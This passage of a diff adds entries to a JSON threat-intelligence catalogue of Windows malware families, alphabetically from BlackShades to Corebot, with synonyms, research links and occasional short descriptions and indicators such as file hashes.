"https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/", + "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", + "value": "BlackShades", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" + ] + }, + "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", + "value": "Boaxxe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" + ] + }, + "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", + "value": "Bohmini", + "description": "" + }, + { + "meta": { + "synonyms": [ + "KBOT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", + "https://asert.arbornetworks.com/communications-bolek-trojan/", + "http://www.cert.pl/news/11379" + ] + }, + "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", + "value": "Bolek", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", + "value": "Bouncer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" + ] + }, + "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", + "value": "Bozok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", + "https://www.us-cert.gov/ncas/alerts/TA18-149A", + "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", + "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" + ] + }, + "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", + "value": "Brambul", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "fbed27da-551d-4793-ba7e-128256326909", + "value": "BravoNC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader", + "https://malpedia.caad.fkie.fraunhofer.de" + ] + }, + "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", + "value": "Breakthrough", + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", + "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html", + "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/" + ] + }, + "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", + "value": "Bredolab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", + "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" + ] + }, + "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", + "value": "BrutPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", + "value": "BS2005", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", + "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" + ] + }, + "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", + "value": "BTCWare", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" + ] + }, + "uuid": "16794655-c0e2-4510-9169-f862df104045", + "value": "Bugat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ratopak" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", + "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", + "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", + "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", + "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" + ] + }, + "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", + "value": "Buhtrap", + "description": "" + }, + { + "meta": { + "synonyms": [ + "R2D2", + "0zapftis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", + "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf", + "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", + "https://www.f-secure.com/weblog/archives/00002249.html", + "https://www.f-secure.com/weblog/archives/00002249.html" + ] + }, + "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", + "value": "Bundestrojaner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", + "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", + "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/", + "http://malware-traffic-analysis.net/2017/05/09/index.html", + "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/" + ] + }, + "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", + "value": "Bunitu", + "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72)." + }, + { + "meta": { + "synonyms": [ + "spyvoltar" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", + "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" + ] + }, + "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", + "value": "Buterat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus" + ] + }, + "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", + "value": "Buzus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" + ] + }, + "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", + "value": "BYEBY", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" + ] + }, + "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", + "value": "c0d0so0", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" + ] + }, + "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", + "value": "CabArt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Cadelle" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" + ] + }, + "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", + "value": "CadelSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", + "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" + ] + }, + "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", + "value": "CamuBot", + "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", + "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" + ] + }, + "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", + "value": "Cannibal Rat", + "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable." + }, + { + "meta": { + "synonyms": [ + "Anunak" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", + "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", + "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + ] + }, + "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", + "value": "Carbanak", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" + ] + }, + "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", + "value": "Carberp", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", + "value": "Cardinal RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", + "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" + ] + }, + "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", + "value": "Casper", + "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", + "value": "Catchamas", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", + "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", + "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", + "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", + "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", + "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", + "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", + "https://blog.avast.com/progress-on-ccleaner-investigation", + "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", + "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", + "https://twitter.com/craiu/status/910148928796061696", + "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", + "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", + "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", + "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" + ] + }, + "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", + "value": "CCleaner Backdoor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cerebrus" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", + "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" + ] + }, + "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", + "value": "CenterPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", + "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", + "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/", + "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html" + ] + }, + "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", + "value": "Cerber", + "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" + ] + }, + "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", + "value": "Cerbu", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ham Backdoor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", + "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", + "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", + "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" + ] + }, + "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", + "value": "ChChes", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cherrypickerpos", + "cherrypicker", + "cherry_picker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" + ] + }, + "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", + "value": "CherryPicker POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", + "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" + ] + }, + "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", + "value": "ChewBacca", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" + ] + }, + "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", + "value": "Chinad", + "description": "Adware that shows advertisements using plugin techniques for popular browsers" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" + ] + }, + "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", + "value": "Chir", + "description": "" + }, + { + "meta": { + "synonyms": [ + "AndroKINS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "https://www.s21sec.com/en/blog/2017/07/androkins/", + "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" + ] + }, + "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", + "value": "Chthonic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", + "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", + "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", + "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", + "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" + ] + }, + "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", + "value": "Citadel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", + "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" + ] + }, + "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", + "value": "Client Maximus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", + "https://www.f-secure.com/weblog/archives/00002822.html" + ] + }, + "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", + "value": "Cloud Duke", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", + "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" + ] + }, + "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", + "value": "CMSBrute", + "description": "" + }, + { + "meta": { + "synonyms": [ + "meciv" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", + "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", + "https://twitter.com/ClearskySec/status/963829930776723461", + "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties" + ] + }, + "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", + "value": "CMSTAR", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html" + ] + }, + "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", + "value": "Cobalt Strike", + "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", + "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", + "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html" + ] + }, + "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", + "value": "Cobian RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "COOLPANTS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", + "https://www.group-ib.com/blog/renaissance", + "https://asert.arbornetworks.com/double-the-infection-double-the-fun/" + ] + }, + "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", + "value": "CobInt", + "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager." + }, + { + "meta": { + "synonyms": [ + "Carbon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", + "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", + "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://github.com/hfiref0x/TDL" + ] + }, + "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", + "value": "Cobra Carbon System", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", + "https://twitter.com/JaromirHorejsi/status/817311664391524352" + ] + }, + "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", + "value": "CockBlocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" + ] + }, + "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", + "value": "CodeKey", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", + "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" + ] + }, + "uuid": "9481d7b1-307c-4504-9333-21720b85317b", + "value": "Cohhoc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", + "https://secrary.com/ReversingMalware/CoinMiner/", + "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/" + ] + }, + "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", + "value": "Coinminer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bandios", + "GrayBird" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", + "https://twitter.com/anyrun_app/status/976385355384590337", + "https://secrary.com/ReversingMalware/Colony_Bandios/", + "https://pastebin.com/GtjBXDmz" + ] + }, + "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", + "value": "Colony", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" + ] + }, + "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", + "value": "Combojack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", + "value": "Combos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", + "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" + ] + }, + "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", + "value": "ComodoSec", + "description": "" + }, + { + "meta": { + "synonyms": [ + "lojack" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", + "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", + "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", + "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research", + "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/" + ] + }, + "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685", + "value": "Computrace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", + "https://twitter.com/struppigel/status/816926371867926528" + ] + }, + "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", + "value": "ComradeCircle", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", + "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" + ] + }, + "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", + "value": "concealment_troy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "downadup", + "traffic converter" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", + "http://contagiodump.blogspot.com/2009/05/win32conficker.html" + ] + }, + "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", + "value": "Conficker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", + "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/" + ] + }, + "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", + "value": "Confucius", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", + "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" + ] + }, + "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", + "value": "Contopee", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", + "value": "CookieBag", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", + "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", + 